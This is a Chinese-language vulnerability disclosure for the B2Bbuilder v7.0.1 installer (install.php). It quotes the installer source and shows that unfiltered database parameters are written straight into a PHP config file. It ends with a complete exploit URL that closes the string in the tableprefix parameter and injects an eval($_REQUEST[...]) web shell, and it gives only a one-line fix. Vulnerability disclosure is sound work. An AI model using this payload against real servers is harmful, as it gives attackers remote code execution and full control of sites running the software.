###0x01漏洞简介 B2Bbuilder v7.0.1 在文件install.php处存在一个设计缺陷,导致可无限制getshell。 ###0x02漏洞详情 /install/install.php ``` if($action == "setup") { //检查参数是否完整 $dbhost = $_GET['dbhost']; $port = $_GET['port']; $dbname = $_GET['dbname']; $dbuser = $_GET['dbuser']; $dbpassword = $_GET['dbpassword']; $tableprefix = $_GET['tableprefix']; $guid = $_GET['guid']; if(!$port) $port = 3306; if ($dbhost && $port && $dbname && $dbuser && $dbpassword && $tableprefix && $guid) { file_put_contents("db.txt", $dbhost.'|'.$port .'|'.$dbname .'|'.$dbuser .'|'.$dbpassword .'|'.$tableprefix.'|'.$guid); $link = mysql_connect($dbhost . ":" . $port, $dbuser, $dbpassword); if($link) { mysql_query("CREATE DATABASE IF NOT EXISTS `".$dbname."`;", $link); mysql_query("SET NAMES 'utf8',character_set_client=binary,sql_mode='';",$link); $link2 = mysql_select_db($dbname, $link); if($link2) { //==========================================================更新进度 file_put_contents('progress.txt', 10); //安装步骤1. 创建数据库结构 $sqlfile =...
###0x01漏洞简介 B2Bbuilder v7.0.1 在文件install.php处存在一个设计缺陷,导致可无限制getshell。 ###0x02漏洞详情 /install/install.php ``` if($action == "setup") { //检查参数是否完整 $dbhost = $_GET['dbhost']; $port = $_GET['port']; $dbname = $_GET['dbname']; $dbuser = $_GET['dbuser']; $dbpassword = $_GET['dbpassword']; $tableprefix = $_GET['tableprefix']; $guid = $_GET['guid']; if(!$port) $port = 3306; if ($dbhost && $port && $dbname && $dbuser && $dbpassword && $tableprefix && $guid) { file_put_contents("db.txt", $dbhost.'|'.$port .'|'.$dbname .'|'.$dbuser .'|'.$dbpassword .'|'.$tableprefix.'|'.$guid); $link = mysql_connect($dbhost . ":" . $port, $dbuser, $dbpassword); if($link) { mysql_query("CREATE DATABASE IF NOT EXISTS `".$dbname."`;", $link); mysql_query("SET NAMES 'utf8',character_set_client=binary,sql_mode='';",$link); $link2 = mysql_select_db($dbname, $link); if($link2) { //==========================================================更新进度 file_put_contents('progress.txt', 10); //安装步骤1. 创建数据库结构 $sqlfile = 'B2Bbuilder.sql'; $query = ''; $fp = fopen(dirname(__FILE__).'/' . $sqlfile,'r'); while($mysql=GetNextSQL()) { mysql_query($mysql); } fclose($fp); //--------------------------------- $rurl=$_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; $aurl = explode("/", $rurl); $realurl=''; for($i=0;$i<count($aurl)-2;$i++) $realurl=$realurl.$aurl[$i]."/"; $realurl="http://".$realurl; $realurl=substr($realurl,0,-1); $burl=explode(".",$realurl); $pb=array_shift($burl); $baseurl=str_replace($pb.'.','',$_POST["weburl"]); $baseurl=str_replace('http://','',$_POST["weburl"]); $baseurl=explode('/',$baseurl); $baseurl=$baseurl[0]; if(substr($baseurl,0,3)=='loc'||substr($baseurl,0,3)=='127') mysql_query("update ".$tableprefix."web_config set `value`='' where `index`='baseurl'"); else mysql_query("update ".$tableprefix."web_config set `value`='".$baseurl."' where `index`='baseurl'"); mysql_query("update ".$tableprefix."web_config set `value`='$realurl' where `index`='weburl'"); //写系统配置文件 $rsid=mysql_query("select * from ".$tableprefix."web_config"); $arr=array(); $configs=array(); while($row=mysql_fetch_array($rsid)) { $arr[] = $row; } foreach($arr as $v) { $index=$v['index']; $value=$v['value']; $configs[$index]=$value; } $write_config_con_array=$configs; $write_config_con_str=serialize($write_config_con_array);//将数组序列化后生成字符串 $write_config_con_str='<?php $config = array_merge($config, unserialize(\''.$write_config_con_str.'\'));?>';//生成要写的内容 $cfp=fopen(dirname(__FILE__).'/../config/web_config.php','w'); fwrite($cfp,$write_config_con_str,strlen($write_config_con_str));//将内容写入文件. fclose($cfp); //======================================================更新进度 file_put_contents('progress.txt', 30); /* //安装步骤2. 导入测试数据 $sqlfile = 'data.txt'; $query = ''; $fp = fopen(dirname(__FILE__).'/' . $sqlfile,'r'); while(!feof($fp)) { $line = rtrim(fgets($fp, 1024)); if(preg_match("#;$#", $line)) { $query .= $line; $query = str_replace('{tableprefix}',$tableprefix,$query); $rs = mysql_query($query,$link); $query=''; } else if(!preg_match("#^(\/\/|--)#", $line)) { $query .= $line; } } fclose($fp); */ //更新进度 file_put_contents('progress.txt', 70); //=======================================================安装步骤3. 配置文件修改 $contents='<?php $config[\'dbhost\'] = \''.$dbhost.'\'; //数据库所在IP地址 $config[\'dbuser\'] = \''.$dbuser.'\'; //数据库用户 $config[\'dbpass\'] = \''.$dbpassword.'\'; //数据库密码 $config[\'dbname\'] = \''.$dbname.'\'; //数据库名 $config[\'port\'] = \''.$port.'\'; //端口 $config[\'table_pre\']=\''.$tableprefix.'\'; //数据库表前缀 $config[\'authkey\']=\''.md5(time().rand(0,100000)).'\'; //数据库表前缀 ?>'; $filename = dirname(__FILE__)."/../config/config.inc.php"; $cfp = fopen($filename,'w'); fwrite($cfp,$contents); fclose($cfp); //更新进度 file_put_contents('progress.txt', 100); outputXml('200'); ``` 他首先把 数据库配置信息写在了同目录的db.txt中 然后连接. 判断是否连接成功 连接成功则执行 那些任务 否则出错 在if($link)的判断中 ``` $contents='<?php $config[\\'dbhost\\'] = \\''.$dbhost.'\\'; //数据库所在IP地址 $config[\\'dbuser\\'] = \\''.$dbuser.'\\'; //数据库用户 $config[\\'dbpass\\'] = \\''.$dbpassword.'\\'; //数据库密码 $config[\\'dbname\\'] = \\''.$dbname.'\\'; //数据库名 $config[\\'port\\'] = \\''.$port.'\\'; //端口 $config[\\'table_pre\\']=\\''.$tableprefix.'\\'; //数据库表前缀 $config[\\'authkey\\']=\\''.md5(time().rand(0,100000)).'\\'; //数据库表前缀 ?>'; $filename = dirname(__FILE__)."/../config/config.inc.php"; $cfp = fopen($filename,'w'); fwrite($cfp,$contents); fclose($cfp); ``` 意思是将数据库配置信息写在config/config.inc.php 由于参数都没有进行过滤 导致 可以闭合界定符并注释掉后面的内容 构造URL ``` http://localhost/B2Bbuilder/install/install.php?action=setup&dbhost=localhost&port=3306&dbname=xxsb&dbuser=root&dbpassword=root&tableprefix=xxxx';eval($_REQUEST[xsec]);//&guid=xxxx ``` 只需要自己准备一个数据库并填入相对应的地方 提交即可getshell  不用去理会xml报错。 ###0x03修复方案 完善代码设计。
